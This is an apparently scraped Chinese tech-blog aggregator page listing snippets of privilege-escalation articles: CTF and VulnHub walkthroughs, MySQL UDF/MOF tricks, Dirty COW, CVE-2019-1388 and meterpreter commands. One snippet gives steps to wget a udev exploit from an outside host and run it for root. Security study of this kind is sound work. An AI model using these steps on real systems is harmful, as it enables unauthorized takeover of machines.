E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
sudo-docker提权
记一次vulnhub|渗透测试DC-4(常规和非预期
提权
思路)
DC-40X01MainPoint1.Burpsuite爆破模块进行简单爆破2.Hydra爆破进行SSH连接3.CVE-2019-10149–exim漏洞进行本地
提权
4.teehee
提权
0X02前期嗅探和端口探测
crisprx
·
2020-06-23 00:30
CTF实践
VulnHub渗透实战--hacknos
Hacknos0X01MainPoint1.KaliLinux的字典生成工具-Cewl(爬取页面)2.反弹shell连接3.docker容器
提权
4.cpulimit
提权
5.hydrahttp-post-from
crisprx
·
2020-06-23 00:30
CTF实践
udev漏洞
提权
过程
1)下载攻击脚本:wgethttp://www.extmail.org/source/exploit-udev-84782)获得udev进程号执行:psax|grepudev|grep-vgrep|awk{'print$1'}获得udev进程号,然后将此数字减1作为exploit-udev-8478的参数,例如命令结果为143则参数为1423)执行:shexploit-udev-8478142su
cnbird2008
·
2020-06-22 23:46
Linux下权限管理
存储用户组账号的密码useradduser1添加用户userdeluser1删除用户groupadduser1添加组用户groupdeluser1删除组用户passwdroot给用户root设置密码suroot临时
提权
到
aliusa
·
2020-06-22 23:47
MySQL_MOF
提权
一、原理Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式(MOF)文件:将MOF文件执行为命令行参数及Mofcomp.exe文件使用IMofCompiler接口和$CompileFile方法拖放到%SystemRoot%\System32\Wbem\MOF文件夹下的MOF文件中托管对象格式(MOF)文件在C:\Windows\System32\wbem\MOF目录下
beiwo
·
2020-06-22 22:00
内网渗透-域渗透的记录
MS14-068漏洞
提权
(限制条件:打了补丁或者域中有Win2012/2012R2的域控):首先,需要拥有一台域内普通用户(假设为用户A)账户权限,知道此账户的账号密码。
听风说旧人
·
2020-06-22 21:32
渗透
CVE-2019–9193所谓的psql的
提权
漏洞?
来源:https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5翻译:https://nosec.org/home/detail/2368.html描述PostgreSQL从9.3到最新的11.2版本默认开启,影响Linux
caiqiiqi
·
2020-06-22 19:06
安全
最新Windows 7安全桌面
提权
漏洞风险提示与过程披露
不想看废话可以直接拉到中间看视频演示,一步到位。Microsoft在2019年11月将此漏洞修补为CVE-2019-1388。在其撰写的文章中,他们指出此修复程序是通过“确保Windows证书对话框正确执行用户权限”实现的。该漏洞可在UAC(用户帐户控制)机制中找到。默认情况下,Windows在称为“安全桌面”的单独桌面上显示所有UAC提示。提示本身是由名为可执行文件生成的,该可执行文件以Syst
blackorbird
·
2020-06-22 18:28
安全漏洞--linux 最新内核通用
提权
漏洞利用示例 (脏牛Dirty COW)
一个低权限的本地用户能够利用此漏洞获取其他只读内存映射的写权限,有可能进一步导致
提权
漏洞。
5t4rk
·
2020-06-22 18:39
源码分享
安全札记
linux系统
linux编程
技术文章
漏洞学习
day22--操作系统定时任务
课程介绍部分定时任务概念介绍定时任务实现方式定时任务配置应用定时任务操作练习2.课程知识回顾掌握文件权限信息掌握系统默认权限设置umask了解系统用户相关文件/etc/passwd/etc/shadow了解系统用户相关目录/etc/skel掌握普通用户
提权
方法
IT小白_鑫茂
·
2020-06-22 15:24
用MSF进行
提权
在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行
提权
,在MSF里meterpreter很强大的!我们先用msfvenom生成一个EXE的木马后门。
aozhuo4755
·
2020-06-22 14:24
红队武器库-网络安全人员必备
包含内容:侦察武器化投递命令与控制横向移动建立立足点
提权
数据传输杂项内容很不错,建议转发朋友圈作为存档。
「已注销」
·
2020-06-22 14:37
CVE-2020-0796 SMBv3漏洞蓝屏复现+
提权
1.漏洞简介MicrosoftWindows和MicrosoftWindowsServer都是美国微软(Microsoft)公司的产品,MicrosoftWindows是一套个人设备使用的操作系统,MicrosoftWindowsServer是一套服务器操作系统,ServerMessageBlock是其中的一个服务器信息传输协议。微软公布了在ServerMessageBlock3.0(SMBv3)
anlalu233
·
2020-06-22 14:37
cve复现
msf
提权
命令/meterpreter下的几个命令
通过这次我也学到了以下几个msf
提权
相关的命令:切换到另一个用户界面(该功能基于那些用户已登录)。screenshot对目标主机的屏幕进行截图。uploadfile向目标主机上传文件。
aiquan9342
·
2020-06-22 13:12
Vulnhub-DC1靶机渗透
0x04
提权
之路在网站根目录,这里能发现flag1.txtdrupal的数据库配置文件在sites/default/settings.phpcatsetting
adminuil
·
2020-06-22 12:20
渗透测试
Metasploitable2脏牛
提权
0x00背景用Metasploitable2靶机进行模拟
提权
。0x01Nessus扫描靶机结果如下:这里主要关注到是已经不支持的unix系统,考虑能不能用脏牛
提权
。
adminuil
·
2020-06-22 12:15
渗透测试
MySQL_UDF
提权
大三就快结束啦,也要轮到我找工作啦,结合网上的资料和自己的经验准备了一些材料,算是对自己技术方面的小小总结吧。趁这个机会查缺补漏做一些原来知道但没有动手试过的实验。一、原理udf即userdefinedfunction,文件后缀为.dll。通过在udf文件中定义新函数,可以对mysql的功能进行扩充,利用mysql账号root权限创建可以执行系统命令函数的udf.dll动态链接库,把权限从执行sq
beiwo
·
2020-06-22 11:00
joomla渗透测试(脏牛
提权
)
本来是个域渗透,不过环境有问题,就当作web题在做了解题过程这是一个joomlacms我们先扫一下目录连接mysql得到MySQL的账号和密码然后创建新的管理员INSERTINTO`am2zu_users`(`name`,`username`,`password`,`params`,`registerDate`,`lastvisitDate`,`lastResetTime`)VALUES('Adm
HyyMbb
·
2020-06-22 10:25
渗透测试
C++
提权
BOOLEnableDebugPrivilege(){HANDLEhToken;BOOLfOk=FALSE;if(OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)){TOKEN_PRIVILEGEStp;tp.PrivilegeCount=1;LookupPrivilegeValue(NULL,SE_DEBU
(-: LYSM :-)
·
2020-06-22 05:42
C++功能函数
mysql udf
提权
mysql的udf
提权
方法01May2013UDF(用户定义函数)是一类对MYSQL服务器功能进行扩充的代码,通常是用C(或C++)写的。
SilenceGG
·
2020-06-22 05:30
SQL
提权
和文件上传下载的操作
1.用户
提权
:在root用户登录下,cd/home/,输入:visudo找到此节点在如图所示处,输入:%用户名ALL=(ALL)ALL然后wq保存退出。
码畜小李哥
·
2020-06-22 05:54
CVE-2020-0796复现(小结问题)
exp1地址exp2地址msf版本
提权
地址检测地址问题1:Python版本和漏洞是否成功有无关系解决:python3.6-8版本我都试过了,都是几率问题,未发现因版本影响脚本正常执行,据说是因为python3
Ping_Pig
·
2020-06-22 03:24
靶机实验报告
Windows中错误报告机制导致的
提权
漏洞(CVE-2019-0863)
在2018年12月,一个名为“SandboxEscaper”的黑客公开了一个WindowsErrorReporting(WER)组件中的0day漏洞。而根据他所提供的信息,我又发现了另一个0day漏洞,可被用于非法提升系统权限。根据微软方面的说法,已有攻击者利用这个漏洞进行攻击,但直到2019年5月该漏洞补丁才发布。那么,这个漏洞的原理是啥呢?微软的又一次失误WindowsErrorReporti
NOSEC2019
·
2020-06-22 02:50
安全
CVE-2019-1405和CVE-2019-1322:通过UPnP Device Host和Update Orchestrator服务进行权限提升
介绍这篇文章主要讲述了由NCCGroup研究人员所发现的两个通过COM本地服务进行非法
提权
的漏洞。
NOSEC2019
·
2020-06-22 02:19
安全
HP Touchpoint Analytics漏洞影响大量惠普电脑
SafeBreach的专家发现,预装在惠普电脑上地HPTouchpointAnalytics服务存在一个严重漏洞,可导致非法
提权
。
NOSEC2019
·
2020-06-22 02:18
安全
安全
惠普
基于webshell
提权
1.Server-u
提权
Server-u是windows平台的FTP服务器软件,通过使用server-u,用户能够将任何一台PC设置成一个FTP服务器,这样,用户就能够使用FTP协议进行文件或目录的复制
玄瞋
·
2020-06-22 00:08
记一次完整的渗透测试
目录前言掉坑起因(通达OA前台任意用户登录)掉坑过程一(上传webshell问题)掉坑过程二(cmdshell
提权
问题)总结前言本次渗透测试过程大概是这样的:通达OA前台任意用户登录-上传webshell
LiuWang0314
·
2020-06-22 00:02
渗透测试
渗透测试流程详解
能否
提权
等。确定需求:web应用的漏洞(新上线程序)?业务逻辑漏洞(针对业务的)?人员权限管理漏洞(针对人员、权限)?等等。(立体全方位)根据需求和自己技术能力来确
JieDG
·
2020-06-21 23:00
如何轻松破解windows密码(运行即可,免重启)
win7,win10及远程连接密码.废话不多说直接上图.没错,他就是大名鼎鼎的mimikatz,接下来看我如何破解一台windows电脑(仅用于教学目的,不可用于非法行为)首先,以管理员身份打开,否则接下来
提权
不了
Hallo_ZM
·
2020-06-21 21:02
信息安全
mimikatz
安全工具
windows
密码
破解
SQL注入篇:SQL 注入靶场练习【实例6】
当你的才华还撑不起你的野心时那你就应该静下心来学习SQL注入靶场练习【实例6】0x01通过cmd命令
提权
根据实例5的演示,我已经通过上传一句话马,用菜刀连接了上传的这个文件,从而得到了后台的部分权限。
Agan '
·
2020-06-21 21:09
渗透测试
SQL
注入靶场实例
Pentest Wiki Part5
提权
pentestwikipart5权限提升
提权
是指利用操作系统或应用软件中的程序错误、设计缺陷或配置疏忽来获取对应用程序或用户来说受保护资源的高级访问权限。
FLy_鹏程万里
·
2020-06-21 20:34
【信息安全】
信安
漏洞利用与
提权
(一):
提权
基础
1.
提权
概述1.1概述
提权
顾名思义就是提高自己在系统中的权利。渗透测试以获取系统的最高权限为目标,首先通过寻找漏洞,获取WebShell权限,然后进行
提权
。
黎先生你好
·
2020-06-21 19:16
Cyber
Security
EXCEL加载项的安装与取消
解决方法,参照了这个技术支持和这篇对访问权限
提权
的回答,最终
Andrewniu
·
2020-06-21 16:37
Excel操作类
MS16-032
提权
漏洞复现
exploit-db的详情:https://www.exploit-db.com/exploits/39574/注意点:此漏洞影响从Vista到Windows10的所有Windows版本(包括服务器版本)以及为了实现利用,因为PowerShell脚本指示需要满足以下要求:目标系统需要有2个以上的CPU核心PowerShellv2.0及更高版本必须正在运行此漏洞会影响以下Microsoft产品:Wi
Adminxe
·
2020-06-21 16:48
漏洞复现
渗透测试
MS16-032
渗透测试
提权漏洞
CVE-2020-0796 SMB远程代码执行漏洞(分析、验证及加固)
0x00前言最近一段时间一直忙,挺火的CVE-2020-0796(永恒之黑)都没来的及复现,今天趁着网快,赶快把漏洞系统下载下,并且准备了检测payload、蓝屏payload、
提权
payload、命令执行
Adminxe
·
2020-06-21 16:47
渗透测试
漏洞复现
永恒之黑
CVE-2020-0796
漏洞复现
渗透测试
系统安全
利用AI+大数据的方式分析恶意样本(四)
文章目录系列文章目录本文主旨恶意代码功能下载器和启动器后门登陆凭证窃取存活机制
提权
隐藏踪迹——用户态的Rootkit环境配置预备知识节点和边二分网络网络可视化使用NetworkX构建网络使用GraphViz
西杭
·
2020-06-21 16:32
基于深度学习的恶意代码检测
分类实战
安全
提权
--Windows
提权
方式总结
文章目录一、
提权
含义二、环境搭建2.1环境一览2.2靶机环境搭建三、信息收集3.1前提条件3.2基本信息收集3.2.1判断操作系统3.2.2判别当前权限3.2.3其它信息获取3.3高级信息收集3.3.1
風月长情
·
2020-06-21 16:55
权限提升
windows UAC
提权
CVE-2019-1388
目录声明漏洞背景影响版本漏洞复现环境漏洞利用修复建议参考链接声明此文章仅用于学习研究使用,请遵守《网络安全法》等相关法律法规。多行善事,为国家网络安全多做贡献。漏洞背景该漏洞位于Windows的UAC(UserAccountControl,用户帐户控制)机制中。默认情况下,Windows会在一个单独的桌面上显示所有的UAC提示——SecureDesktop。这些提示是由名为consent.exe的
Circle_xx
·
2020-06-21 13:27
web安全
Apache
提权
漏洞(CVE-2019-0211)复现
本月Apache被公布了一个
提权
的漏洞,并且前天在GitHub上公布出了利用脚本,这几天我负责漏洞应急这个漏洞。
晓得哥
·
2020-06-21 13:11
漏洞
晓得哥的技术之路
PHPInfo()信息泄漏漏洞利用及
提权
没有及时删除这些提供环境测试的文件,比较常见的为phpinfo.php、1.php和test.php,虽然通过phpinfo获取的php环境以及变量等信息,但这些信息的泄露配合一些其它漏洞将有可能导致系统被渗透和
提权
我是simeon
·
2020-06-21 13:38
安全技术研究
一句话***(webshell)是如何执行命令的
在很多的***过程中,***人员会上传一句话***(简称webshell)到目前web服务目录继而
提权
获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话***到底是如何执行的呢,下面我们就对
weixin_34381687
·
2020-06-21 11:46
利用phpStudy 探针
提权
网站服务器
今天看到论坛有人发布了一个通过这phpStudy探针关键字搜索检索
提权
网址服务器,这个挺简单的.记录一下吧。搜索引擎KeyWord:phpStudy探针2014多往后翻翻。翻个几十页最好。
Ntinnng
·
2020-06-21 08:52
安全意识
Linux下反弹shell方法
大家在做渗透测试的时候,遇到linux的服务器,想反弹shell回来本地溢出
提权
,怎么办?上传反弹脚本?当然可以,今天再告诉大家几种方法,国外大牛和国内大牛整理的,希望大家喜欢。
test_20140325
·
2020-06-21 08:27
phpmyadmin getshell到
提权
一.环境准备:靶机:win732位。环境:php:5.45MYsql:5.5.53Apache:2.4s二.开始攻击。访问目标站点,发现开启3306端口,经过弱口令,爆破,目录泄露等途径已经获知PhpMyadmin的账号密码是rootroot1.开始登陆到目标服务器的PhpMyadmin2.检测MySQL全局变量(generallog、generallogfile)的值。generallog指的是
shuteer_xu
·
2020-06-21 07:09
meterpreter
提权
小结
经过一波操作我们成功进入meterperter,接下来主要就如何在meterpreter进行
提权
首先我们可以输入getuid来查看当前用户的权限~可以看到我们貌似可能是管理员权限,到底是不是还有待验证,
MercyLin
·
2020-06-21 06:35
网安
高版本的udf
提权
配置环境:phpstudy(mysql5.5.53版本)2012R264位首先访问脚本,是款暗月的mysql全版本通杀
提权
神器,网上找的。
椰树ii
·
2020-06-21 05:40
渗透
Mac下错误修改/etc/sudoers的沉痛教训
sudo
提权
免密码为了贪图便利,不想每次sudo
提权
还要输入密码,故用vim修改了/etc/sudoers这个文本文件。
qingshu711
·
2020-06-21 02:20
macos
sudo
root
烂土豆Juicypotato
提权
原理和利用
0x00Potato(烂土豆)
提权
的原理:所谓的烂土豆
提权
就是俗称的MS16-075可以将Windows工作站上的特权从最低级别提升到“NTAUTHORITY\SYSTEM”–Windows计算机上可用的最高特权级别
god_zZz
·
2020-06-21 01:25
内网安全研究
php5.4.3的远程代码执行漏洞,
提权
挺管用
PHPcom_print_typeinfo()的漏洞,通过PHP代码调用”exec”可运行SHELL命令用这个
提权
是不是很方便了?
god_7z1
·
2020-06-21 01:24
漏洞收集
静态网页制作小技巧(logo及字体图标)
logo优化1)logo里首先放一个h1标签,目的是为了
提权
,告诉搜索引擎,这个地方很重要;2)h1里面放一个a标签,可以返回首页,给a一个大小和logo的背
Jdoit CW
·
2020-06-21 00:13
html(5)+css(3)
上一页
43
44
45
46
47
48
49
50
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他